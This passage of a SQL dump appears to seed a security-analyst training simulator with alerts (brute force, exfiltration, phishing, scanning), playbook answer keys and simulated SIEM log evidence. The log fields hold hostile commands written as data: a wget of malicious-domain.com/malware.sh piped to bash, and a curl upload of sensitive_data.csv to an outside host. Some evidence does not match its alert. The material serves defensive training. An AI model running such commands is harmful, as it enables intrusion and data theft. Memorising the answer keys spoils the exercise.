'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-15T12:47:56.750Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T03:45:12Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"internal-host-01\\\",\\\"command_line\\\":\\\"wget http://malicious-domain.com/malware.sh -O /tmp/malware.sh && bash /tmp/malware.sh\\\"}\"},{\"timestamp\":\"2026-02-15T12:46:56.750Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T03:45:12Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"internal-host-01\\\",\\\"command_line\\\":\\\"wget http://malicious-domain.com/malware.sh -O /tmp/malware.sh && bash /tmp/malware.sh\\\"}\"},{\"timestamp\":\"2026-02-15T12:45:56.750Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T03:45:12Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"internal-host-01\\\",\\\"command_line\\\":\\\"wget http://malicious-domain.com/malware.sh -O /tmp/malware.sh && bash /tmp/malware.sh\\\"}\"},{\"timestamp\":\"2026-02-15T12:44:56.750Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T03:45:12Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"internal-host-01\\\",\\\"command_line\\\":\\\"wget http://malicious-domain.com/malware.sh -O /tmp/malware.sh && bash /tmp/malware.sh\\\"}\"},{\"timestamp\":\"2026-02-15T12:43:56.750Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T03:45:12Z\\\",\\\"event_type\\\":\\\"process_execution\\\",\\\"src_ip\\\":\\\"10.0.0.15\\\",\\\"dst_ip\\\":\\\"\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"internal-host-01\\\",\\\"command_line\\\":\\\"wget http://malicious-domain.com/malware.sh -O /tmp/malware.sh && bash /tmp/malware.sh\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1262, 'Brute Force Attack Detected on External Facing Service', 'critical', 'FTK', 'Multiple failed login attempts detected from an external IP address, indicating a brute force attack. The source IP has been reported for similar activities.', 'Brute Force', 'T1078', 1, 'closed', NULL, '{\"timestamp\":\"2026-02-14T10:15:30Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.5\",\"username\":\"admin\",\"hostname\":\"web-server-01\",\"failed_attempts\":\"25\"}', '2026-02-14 17:39:26', '2026-02-15 12:47:56', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"internal\",\"details\":\"Common administrative username targeted in attacks\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The high number of failed attempts and malicious history of the IP address confirm a brute force attack.\"}', 'Beginner', 'IR', 3, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-15T12:47:56.751Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T10:15:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"web-server-01\\\",\\\"failed_attempts\\\":\\\"25\\\"}\"},{\"timestamp\":\"2026-02-15T12:46:56.751Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T10:15:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"web-server-01\\\",\\\"failed_attempts\\\":\\\"25\\\"}\"},{\"timestamp\":\"2026-02-15T12:45:56.751Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T10:15:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"web-server-01\\\",\\\"failed_attempts\\\":\\\"25\\\"}\"},{\"timestamp\":\"2026-02-15T12:44:56.751Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T10:15:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"web-server-01\\\",\\\"failed_attempts\\\":\\\"25\\\"}\"},{\"timestamp\":\"2026-02-15T12:43:56.751Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-14T10:15:30Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.45\\\",\\\"dst_ip\\\":\\\"192.168.1.5\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"web-server-01\\\",\\\"failed_attempts\\\":\\\"25\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1263, 'Data Exfiltration via Unauthorized Cloud Storage Access', 'critical', 'Netskope', 'An internal machine attempted to upload sensitive PII data to an unauthorized cloud storage service. The activity was detected through abnormal outbound data transfer patterns.', 'Data Exfil', 'T1567', 1, 'resolved', NULL, '{\"timestamp\":\"2026-02-23T23:45:12Z\",\"event_type\":\"data_upload\",\"src_ip\":\"192.168.1.105\",\"dst_ip\":\"203.0.113.56\",\"username\":\"jdoe\",\"hostname\":\"CORP-LAPTOP-01\",\"request_body\":\"Base64 encoded payload of the file\",\"command_line\":\"curl -X PUT --data-binary @sensitive_data.csv https://unauthorized-storage.com/upload\"}', '2026-02-24 03:10:37', '2026-02-27 06:50:27', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the user\'s machine\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.56\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 120 times for unauthorized data exfiltration\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"Base64 encoded payload of the file\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Detected sensitive data exfiltration attempt\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The IP and payload indicate a clear attempt to exfiltrate data to an unauthorized service.\"}', 'Intermediate', 'DLP', 5, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.701Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-23T23:45:12Z\\\",\\\"event_type\\\":\\\"data_upload\\\",\\\"src_ip\\\":\\\"192.168.1.105\\\",\\\"dst_ip\\\":\\\"203.0.113.56\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAPTOP-01\\\",\\\"request_body\\\":\\\"Base64 encoded payload of the file\\\",\\\"command_line\\\":\\\"curl -X PUT --data-binary @sensitive_data.csv https://unauthorized-storage.com/upload\\\"}\"},{\"timestamp\":\"2026-02-24T04:21:04.701Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-23T23:45:12Z\\\",\\\"event_type\\\":\\\"data_upload\\\",\\\"src_ip\\\":\\\"192.168.1.105\\\",\\\"dst_ip\\\":\\\"203.0.113.56\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAPTOP-01\\\",\\\"request_body\\\":\\\"Base64 encoded payload of the file\\\",\\\"command_line\\\":\\\"curl -X PUT --data-binary @sensitive_data.csv https://unauthorized-storage.com/upload\\\"}\"},{\"timestamp\":\"2026-02-24T04:20:04.701Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-23T23:45:12Z\\\",\\\"event_type\\\":\\\"data_upload\\\",\\\"src_ip\\\":\\\"192.168.1.105\\\",\\\"dst_ip\\\":\\\"203.0.113.56\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAPTOP-01\\\",\\\"request_body\\\":\\\"Base64 encoded payload of the file\\\",\\\"command_line\\\":\\\"curl -X PUT --data-binary @sensitive_data.csv https://unauthorized-storage.com/upload\\\"}\"},{\"timestamp\":\"2026-02-24T04:19:04.701Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-23T23:45:12Z\\\",\\\"event_type\\\":\\\"data_upload\\\",\\\"src_ip\\\":\\\"192.168.1.105\\\",\\\"dst_ip\\\":\\\"203.0.113.56\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAPTOP-01\\\",\\\"request_body\\\":\\\"Base64 encoded payload of the file\\\",\\\"command_line\\\":\\\"curl -X PUT --data-binary @sensitive_data.csv https://unauthorized-storage.com/upload\\\"}\"},{\"timestamp\":\"2026-02-24T04:18:04.701Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-23T23:45:12Z\\\",\\\"event_type\\\":\\\"data_upload\\\",\\\"src_ip\\\":\\\"192.168.1.105\\\",\\\"dst_ip\\\":\\\"203.0.113.56\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAPTOP-01\\\",\\\"request_body\\\":\\\"Base64 encoded payload of the file\\\",\\\"command_line\\\":\\\"curl -X PUT --data-binary @sensitive_data.csv https://unauthorized-storage.com/upload\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1264, 'Unauthorized Access Attempt on Sensitive Database Detected', 'high', 'Microsoft Purview', 'Multiple failed login attempts were detected on a sensitive database server from an internal IP. The pattern suggests a brute force attack.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-02-24T03:12:34Z\",\"event_type\":\"login_failure\",\"src_ip\":\"192.168.2.50\",\"dst_ip\":\"192.168.2.100\",\"username\":\"admin\",\"hostname\":\"DB-SERVER-01\",\"request_body\":null,\"command_line\":null}', '2026-02-24 03:10:37', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.2.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address potentially compromised\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.2.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Target database server IP\"}}],\"expected_actions\":[\"reset_credentials\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The pattern of login failures indicates a brute force attempt on the database server.\"}', 'Intermediate', 'DLP', 5, 1, 'HEALTHCARE', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.706Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T03:12:34Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.2.50\\\",\\\"dst_ip\\\":\\\"192.168.2.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"DB-SERVER-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:21:04.706Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T03:12:34Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.2.50\\\",\\\"dst_ip\\\":\\\"192.168.2.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"DB-SERVER-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:20:04.706Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T03:12:34Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.2.50\\\",\\\"dst_ip\\\":\\\"192.168.2.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"DB-SERVER-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:19:04.706Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T03:12:34Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.2.50\\\",\\\"dst_ip\\\":\\\"192.168.2.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"DB-SERVER-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:18:04.706Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T03:12:34Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"192.168.2.50\\\",\\\"dst_ip\\\":\\\"192.168.2.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"DB-SERVER-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1265, 'Suspicious Email with Potential Phishing Link Detected', 'medium', 'Symantec DLP', 'An email containing a suspicious link was received by an employee. The link points to a site known for phishing activities.', 'Phishing', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-02-24T10:15:20Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.24\",\"dst_ip\":\"192.168.1.20\",\"username\":\"susan.smith\",\"hostname\":\"CORP-EMAIL-02\",\"email_sender\":\"noreply@phishingdomain.com\",\"url\":\"http://phishing-link.com/login\",\"request_body\":null,\"command_line\":null}', '2026-02-24 03:10:37', '2026-02-24 04:22:04', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.24\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP linked to multiple phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://phishing-link.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL associated with phishing activities\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"noreply@phishingdomain.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Email domain known for phishing attempts\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"block_url\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contains a link to a known phishing site, posing a threat to credential security.\"}', 'Intermediate', 'DLP', 5, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.707Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T10:15:20Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.24\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"susan.smith\\\",\\\"hostname\\\":\\\"CORP-EMAIL-02\\\",\\\"email_sender\\\":\\\"noreply@phishingdomain.com\\\",\\\"url\\\":\\\"http://phishing-link.com/login\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:21:04.707Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T10:15:20Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.24\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"susan.smith\\\",\\\"hostname\\\":\\\"CORP-EMAIL-02\\\",\\\"email_sender\\\":\\\"noreply@phishingdomain.com\\\",\\\"url\\\":\\\"http://phishing-link.com/login\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:20:04.707Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T10:15:20Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.24\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"susan.smith\\\",\\\"hostname\\\":\\\"CORP-EMAIL-02\\\",\\\"email_sender\\\":\\\"noreply@phishingdomain.com\\\",\\\"url\\\":\\\"http://phishing-link.com/login\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:19:04.707Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T10:15:20Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.24\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"susan.smith\\\",\\\"hostname\\\":\\\"CORP-EMAIL-02\\\",\\\"email_sender\\\":\\\"noreply@phishingdomain.com\\\",\\\"url\\\":\\\"http://phishing-link.com/login\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"},{\"timestamp\":\"2026-02-24T04:18:04.707Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T10:15:20Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"198.51.100.24\\\",\\\"dst_ip\\\":\\\"192.168.1.20\\\",\\\"username\\\":\\\"susan.smith\\\",\\\"hostname\\\":\\\"CORP-EMAIL-02\\\",\\\"email_sender\\\":\\\"noreply@phishingdomain.com\\\",\\\"url\\\":\\\"http://phishing-link.com/login\\\",\\\"request_body\\\":null,\\\"command_line\\\":null}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1266, 'Internal Reconnaissance Detected via Network Scanning', 'high', 'Symantec DLP', 'Unusual network scanning activity was detected from an internal IP address, indicating potential reconnaissance efforts.', 'Lateral Movement', 'T1046', 0, 'Closed', 225, '{\"timestamp\":\"2026-02-24T08:45:30Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.3.45\",\"dst_ip\":\"192.168.3.1\",\"username\":\"unknown\",\"hostname\":\"CORP-SCAN-01\",\"request_body\":null,\"command_line\":\"nmap -sP 192.168.3.0/24\"}', '2026-02-24 03:10:37', '2026-03-07 11:57:45', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.3.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP conducting reconnaissance\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"nmap -sP 192.168.3.0/24\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"Command used for network scanning\"}}],\"expected_actions\":[\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The use of an internal IP and network scanning tools suggests reconnaissance activity.\"}', 'Intermediate', 'DLP', 5, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-24T04:22:04.709Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T08:45:30Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.3.45\\\",\\\"dst_ip\\\":\\\"192.168.3.1\\\",\\\"username\\\":\\\"unknown\\\",\\\"hostname\\\":\\\"CORP-SCAN-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"nmap -sP 192.168.3.0/24\\\"}\"},{\"timestamp\":\"2026-02-24T04:21:04.709Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T08:45:30Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.3.45\\\",\\\"dst_ip\\\":\\\"192.168.3.1\\\",\\\"username\\\":\\\"unknown\\\",\\\"hostname\\\":\\\"CORP-SCAN-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"nmap -sP 192.168.3.0/24\\\"}\"},{\"timestamp\":\"2026-02-24T04:20:04.709Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T08:45:30Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.3.45\\\",\\\"dst_ip\\\":\\\"192.168.3.1\\\",\\\"username\\\":\\\"unknown\\\",\\\"hostname\\\":\\\"CORP-SCAN-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"nmap -sP 192.168.3.0/24\\\"}\"},{\"timestamp\":\"2026-02-24T04:19:04.709Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T08:45:30Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.3.45\\\",\\\"dst_ip\\\":\\\"192.168.3.1\\\",\\\"username\\\":\\\"unknown\\\",\\\"hostname\\\":\\\"CORP-SCAN-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"nmap -sP 192.168.3.0/24\\\"}\"},{\"timestamp\":\"2026-02-24T04:18:04.709Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-02-24T08:45:30Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.3.45\\\",\\\"dst_ip\\\":\\\"192.168.3.1\\\",\\\"username\\\":\\\"unknown\\\",\\\"hostname\\\":\\\"CORP-SCAN-01\\\",\\\"request_body\\\":null,\\\"command_line\\\":\\\"nmap -sP 192.168.3.0/24\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
